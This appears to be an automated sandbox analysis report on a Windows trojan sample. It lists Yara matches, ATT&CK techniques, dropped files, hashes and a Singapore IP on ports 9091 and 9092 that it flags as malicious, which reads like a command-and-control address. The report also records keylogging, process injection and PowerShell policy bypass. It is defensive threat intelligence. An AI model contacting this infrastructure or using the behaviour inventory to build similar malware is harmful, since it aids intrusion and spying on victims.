                      Source: Yara matchFile source: 00000003.00000003.3334066140.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510434362.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3165948702.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Update.exe PID: 4348, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.36705bf.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.37f0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.482260b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.92667b.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.37f0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.35b1053.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.36705bf.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.92667b.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1004.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1004.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.35b1053.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3003550749.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3334123549.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3490537983.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2556030347.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3166004269.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2679005729.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510572930.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2841813776.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2679005729.00000000047BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3334066140.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510434362.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3165948702.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Update.exe PID: 4348, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      1
                      Replication Through Removable Media
                      1
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      121
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts1
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory11
                      Peripheral Device Discovery
                      Remote Desktop Protocol1
                      Screen Capture
                      2
                      Encrypted Channel
                      Exfiltration Over Bluetooth1
                      System Shutdown/Reboot
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell
                      Logon Script (Windows)222
                      Process Injection
                      2
                      Obfuscated Files or Information
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin Shares121
                      Input Capture
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      DLL Side-Loading
                      NTDS38
                      System Information Discovery
                      Distributed Component Object Model2
                      Clipboard Data
                      1
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Masquerading
                      LSA Secrets131
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Modify Registry
                      Cached Domain Credentials31
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                      Virtualization/Sandbox Evasion
                      DCSync4
                      Process Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt222
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Indicator Removal
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1584172 Sample: Uulw5M1DfU.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 65 Suricata IDS alerts for network traffic 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 8 other signatures 2->71 9 Uulw5M1DfU.exe 10 2->9         started        process3 file4 51 C:\Users\Public\...\ldplayer9_ld_6000_ld.exe, PE32 9->51 dropped 53 C:\Users\Public\Bilite\Axialis\Update.exe, PE32 9->53 dropped 55 C:\Users\Public\Bilite\Axialis\Update.dll, PE32 9->55 dropped 12 cmd.exe 1 9->12         started        process5 signatures6 73 Bypasses PowerShell execution policy 12->73 15 Update.exe 3 8 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 57 137.220.229.61, 18852, 53790, 53816 BCPL-SGBGPNETGlobalASNSG Singapore 15->57 45 C:\Users\user\AppData\Local\Temp\backup.exe, PE32 15->45 dropped 47 C:\Users\user\AppData\Local\Temp\backup.dll, PE32 15->47 dropped 49 C:\Users\user\AppData\Local\updated.ps1, ASCII 15->49 dropped 59 Contains functionality to inject threads in other processes 15->59 61 Contains functionality to capture and log keystrokes 15->61 63 Contains functionality to inject code into remote processes 15->63 22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 cmd.exe 1 15->26         started        file9 signatures10 process11 process12 28 powershell.exe 1 23 22->28         started        31 conhost.exe 22->31         started        33 powershell.exe 39 24->33         started        35 conhost.exe 24->35         started        37 conhost.exe 26->37         started        39 tasklist.exe 1 26->39         started        41 timeout.exe 1 26->41         started        43 10 other processes 26->43 signatures13 75 Loading BitLocker PowerShell Module 33->75

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Uulw5M1DfU.exe47%ReversingLabsWin32.Trojan.Generic
                      SourceDetectionScannerLabelLink
                      C:\Users\Public\Bilite\Axialis\Update.dll61%ReversingLabsWin32.Trojan.Generic
                      C:\Users\Public\Bilite\Axialis\Update.exe0%ReversingLabs
                      C:\Users\Public\Bilite\ldplayer9_ld_6000_ld.exe4%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\backup.dll61%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Local\Temp\backup.exe0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://go.microsofDSCResources55h0%Avira URL Cloudsafe
                      https://www.ldmnq.com/ldy/xukeXieyi.htmldownloader_jumplink_addresshttps://wpa1.qq.com/V7XjWRDy?_typ0%Avira URL Cloudsafe
                      https://www.ldmnq.com/?n=6120&bd_vid=logidUrlnewTypepost0%Avira URL Cloudsafe
                      http://crl.microk0%Avira URL Cloudsafe
                      137.220.229.61:90920%Avira URL Cloudsafe
                      137.220.229.61:90910%Avira URL Cloudsafe
                      https://go.microsofD0%Avira URL Cloudsafe
                      http://www.ijg.org0%Avira URL Cloudsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      137.220.229.61:9091true
                      • Avira URL Cloud: safe
                      unknown
                      137.220.229.61:9092true
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://ldapi.ldmnq.com/common/baidu/ocpcbaiduUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                            high
                            https://sectigo.com/CPS0Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://ocsp.sectigo.com0Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://go.microsofDSCResources55hpowershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Licensepowershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Iconpowershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://middledata.ldmnq.com/collection/biz/uploadreportUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ldmnq.com/?n=6120&bd_vid=logidUrlnewTypepostUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://middledata.ldmnq.com/collection/biz/uploadUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                    high
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://curl.haxx.se/docs/http-cookies.htmlUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                        high
                                                        https://res.ldmnq.com/ld/leidianexhttps://res.ldmnq.com/download/release/ldinst4.0.exehttps://res.ldUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                          high
                                                          https://go.microsofDpowershell.exe, 00000012.00000002.2561569868.0000000002FAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.microkpowershell.exe, 00000011.00000002.2573835228.0000000007100000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://aka.ms/pscore6lBpowershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ldmnq.com/ldy/xukeXieyi.htmldownloader_jumplink_addresshttps://wpa1.qq.com/V7XjWRDy?_typUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Uulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002AF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000011.00000002.2564538587.0000000004DA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2564538587.0000000004A95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004CB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000012.00000002.2564895316.0000000005BC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://ldapi.ldmnq.com/common/baidu/ocpcUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2564538587.0000000004941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2562549709.0000000004B61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.ijg.orgUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://ldapi.ldmnq.com/mnq/properties?openid=&packageName=https://encdn.ldmnq.com/player_files/openUulw5M1DfU.exe, 00000000.00000003.1743133321.0000000002B87000.00000004.00000020.00020000.00000000.sdmp, ldplayer9_ld_6000_ld.exe.0.drfalse
                                                                              high
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              137.220.229.61
                                                                              unknownSingapore
                                                                              64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1584172
                                                                              Start date and time:2025-01-04 14:46:39 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 8m 55s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Run name:Run with higher sleep bypass
                                                                              Number of analysed new started processes analysed:29
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Uulw5M1DfU.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:F889FE126788FFBAFC2E0CD5E233FEE9.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@43/29@0/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 50%
                                                                              HCA Information:
                                                                              • Successful, ratio: 98%
                                                                              • Number of executed functions: 160
                                                                              • Number of non-executed functions: 230
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target powershell.exe, PID 1836 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 4076 because it is empty
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              No simulations
                                                                              No context
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              BCPL-SGBGPNETGlobalASNSGHGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                                                                              • 118.107.44.219
                                                                              vYeaC4s9zP.exeGet hashmaliciousGhostRatBrowse
                                                                              • 27.124.4.60
                                                                              Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                              • 134.122.133.80
                                                                              BrSgiTp1iH.exeGet hashmaliciousGhostRatBrowse
                                                                              • 134.122.135.95
                                                                              http://smbc.usobd.comGet hashmaliciousUnknownBrowse
                                                                              • 134.122.128.92
                                                                              zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                              • 118.107.44.219
                                                                              017069451a4dbc523a1165a2f1bd361a762bb40856778.exeGet hashmaliciousUnknownBrowse
                                                                              • 27.124.34.140
                                                                              Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                              • 202.79.169.178
                                                                              KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                                                              • 143.92.60.116
                                                                              Whyet-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                              • 118.107.45.13
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\Public\Bilite\Axialis\Update.exe8R2YjBA8nI.exeGet hashmaliciousGhostRatBrowse
                                                                                8R2YjBA8nI.exeGet hashmaliciousUnknownBrowse
                                                                                  6f0slJzOrF.exeGet hashmaliciousGhostRatBrowse
                                                                                    6f0slJzOrF.exeGet hashmaliciousUnknownBrowse
                                                                                      zPJUOck9wt.exeGet hashmaliciousGhostRatBrowse
                                                                                        zPJUOck9wt.exeGet hashmaliciousUnknownBrowse
                                                                                          MEuu1a2o6n.exeGet hashmaliciousGhostRatBrowse
                                                                                            MEuu1a2o6n.exeGet hashmaliciousUnknownBrowse
                                                                                              Process:C:\Users\user\Desktop\Uulw5M1DfU.exe
                                                                                              File Type:openssl enc'd data with salted password, base64 encoded
                                                                                              Category:dropped
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):5.155639062229567
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:iqkYKlSRHOVd9RWHLuupQrSKOyJYHn:ilYKIxOV1WHLTyXSn
                                                                                              MD5:C430E4D79A2FF7DDBEDFBC4E82F44850
                                                                                              SHA1:5C56C238993B933B055FA0844DBC7AF3BF125934
                                                                                              SHA-256:80630814F682068AF61B891845CE55AF3602C4C70BF194FF44EF1438B8F59A8E
                                                                                              SHA-512:A3E9476CD233B7ABD59113DCE57010D304A04EBF2A9BF530E1E162AD140AC100E62B78FCAE74B22E5D5338ECC075CC51F2C25482E03B8D21BAE38E2BD422B658
                                                                                              Malicious:false
                                                                                              Preview:U2FsdGVkX1/f/0v7A74sjSVk08xIvCoStpYVNnxIZCF0itaeIagm7/+XnylCkcSE
                                                                                              Process:C:\Users\user\Desktop\Uulw5M1DfU.exe
                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):340760
                                                                                              Entropy (8bit):6.543019915715004
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/jUaCcM:H66LUtNrIAzCKzRgDKrSeoUalM
                                                                                              MD5:D8B8211D3CF9185D5C882AEF534CFA79
                                                                                              SHA1:157FDE2C93A2A96726C49755C787E805EDE6E980
                                                                                              SHA-256:A250C7CF1645BB2672DE489C1E1164EE0230703A6AC8E8AB8DE6D42E9EAC476C
                                                                                              SHA-512:440E656B42997359CC32647564927AD8D0A65383E7340A7871B62FD87112A3A79C38D4409FA7DEB94C33B297895E522C1ACC9E8AAF7BCE96296CF99EA6F9EDAB
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....mg...........!.........L......Y........................................p............@..........................t..O....t..........p6...............)...@...&...r.......................4.......................w...............................text............................... ..`.rdata..............................@..@.data....!..........................@....00cfg..............................@..@.tls................................@....rsrc...p6.......8..................@..@.reloc...&...@...(..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\Uulw5M1DfU.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):395368
                                                                                              Entropy (8bit):5.090673225697451
                                                                                              Encrypted:false
                                                                                              SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                                                                              MD5:FB325C945A08D06FE91681179BDCCC66
                                                                                              SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                                                                              SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                                                                              SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: 8R2YjBA8nI.exe, Detection: malicious, Browse
                                                                                              • Filename: 8R2YjBA8nI.exe, Detection: malicious, Browse
                                                                                              • Filename: 6f0slJzOrF.exe, Detection: malicious, Browse
                                                                                              • Filename: 6f0slJzOrF.exe, Detection: malicious, Browse
                                                                                              • Filename: zPJUOck9wt.exe, Detection: malicious, Browse
                                                                                              • Filename: zPJUOck9wt.exe, Detection: malicious, Browse
                                                                                              • Filename: MEuu1a2o6n.exe, Detection: malicious, Browse
                                                                                              • Filename: MEuu1a2o6n.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................
